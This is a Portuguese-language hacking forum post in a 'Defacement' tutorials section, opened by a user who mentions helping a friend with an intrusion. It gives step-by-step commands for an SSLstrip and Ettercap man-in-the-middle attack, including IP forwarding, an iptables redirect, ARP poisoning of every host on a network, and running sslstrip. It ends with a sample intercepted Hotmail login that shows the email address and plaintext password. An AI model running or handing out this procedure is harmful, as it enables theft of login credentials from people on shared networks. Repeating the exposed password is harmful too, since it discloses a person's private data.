seja bem vindo ao forum eof, caso nao seja cadastrado se cadastre para poder visualizar todo o conteudo ^^

Você não está conectado. Conecte-se ou registre-se

 » Defacement » Tutorial / Dicas / Videos » Interceptando trafego de rede por Meio de SSLstrip e Ethercap

Interceptando trafego de rede por Meio de SSLstrip e Ethercap

Ver o tópico anterior Ver o tópico seguinte Ir em baixo  Mensagem [Página 1 de 1]

MysteryMind

avatar
avançado
avançado
Bom recentemente tentando ajudar um amigo em uma invasão descobri uma coisa bem interessante e legal,
Já pensaram em interceptar o trafego de rede,
Lembrando não sei se esse procedimento pode ser funcional para interceptar ligações de outras redes que não seja a sua, ainda estou pesquisando isso.

Não tenho certeza que o que vou dizer aqui é totalemente funcional
Mas ao ver isso algo realmente me tocou e disse isso pode ser uma revolução
O SSLStrip criado em 2009 por Moxie Marlinspike foi uma nova façanha Black Hat.

A lógica do SSLstrip é bem simples, ele altera todos os GET's HTTPS por HTTP de uma página, e por meio de um ataque MITM, faz com que a Vítima e o Atacante se comuniquem via HTTP, quando na verdade o Atacante e o Servidor estão se comunicando via HTTPS.

Lembrando esse procedimento pode não funcionar corretamente,
Não tenho certeza da funcionalidade disso pois ainda não testei mas pode ajudar vocês.
De preferencia usem o Back Track 5 ou outro Sistema Operacional para Pentest.

Obs:O procedimento tem que ser feito com algum sistema operacional cujo kernel seja Linux.

O primeiro passo será liberar o repasse de pacotes na máquina do Atacante:

# sysctl -w net.ipv4.ip_forward=1

Onde:

-w : (write) escrever as mudanças no arquivo;


Agora iremos usar o IPtables para redirecionar todo tráfego TCP da porta 80, para TCP 4003 (porta no qual o SSLstrip irá escutar);

# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 4003

Onde:

-t : Tabela do Firewall;
-p : Protocolo;
--dport : Porta de destino;
-j : (jump) ou simplesmente alvo;
--to-port : Redirecionar para uma porta especifica.


O teste de fogo
O próximo passo será rodar o 'Ettercap' para interceptar o tráfego da rede:

# ettercarp -TqM ARP:REMOTE // //

Onde:

-T : (Text) Somente em modo texto;
-q : Modo Silencioso;
-M : (MITM) irá realizar um ataque do tipo Man In The Middle;
ARP : REMOTE: Realiza o envenenamento da tabela ARP das máquinas que estão conectadas na rede. Uma vez que o cache tenha sido envenenado as vítimas irão enviar todos os pacotes para o atacante que, por sua vez, pode modificar e encaminhá-los para o destino real.
// // : Realiza o ataque de envenenamento ARP contra todos os hosts na rede.


Para encerrar, basta abrir outro terminal, e executar o SSLstrip:

# cd /pentest/web/sslstrip
# ./sslstrip.py -a -l 4003

Onde:

-a: Registrar todo o tráfego HTTP e SSL para e do servidor;
-l: (listen) Ouvir em uma determinada porta especifica, o padrão é a porta 10000.


Basta uma nova sessão HTTPS (Gmail, Hotmail, Facebook, etc..) ser aberta, para conseguirmos visualizar de forma clara o usuário e senha do mesmo!

Abaixo um exemplo de conteúdo interceptado:

2011-12-20 12:49:19,605 SECURE POST Data (login.live.com):
login=gabriel.camargo%40hotmail.com&passwd=#Gabriel2011$&type=11&LoginOptions=3&NewUser=1&MEST=&PPSX=PassportRN&PPFT=
CSunM4mofYh
igqiObttRmtoFdxf8alO7UBN1O9Jb2EQYF1T5sE4qGl
teBPzjSYo1kd1jAsP7rlt80UdeEqjMeasL5WXvuVU%21n8NSpKRq3NxmBsw06rOBOfPnz4pejvv3qm0x7rcejM0zU0oCmtF9mL1UqTYa0VQELVDpW
Og3RhYACZh
XqKYJAbxteyPX%21Mr1Yrq*Un8yDSMnbAgENcljztLVOk
*y&idsbho=1&PwdPad=&sso=&i1=&i2=1&i3=19972&i4=&i12=1&i13=&i14=593&i15=1038


Usuário: [Você precisa estar registrado e conectado para ver este link.]
Password: #Gabriel2011$

Créditos: Fórum Viva o Linux
Edição do Tutorial: Ice Mike


_________________ASSINATURA_________________
"Novo ano, mais tédio, mais escola, mais conhecimentos"
Nao ta ruim assim não né?

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo  Mensagem [Página 1 de 1]

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum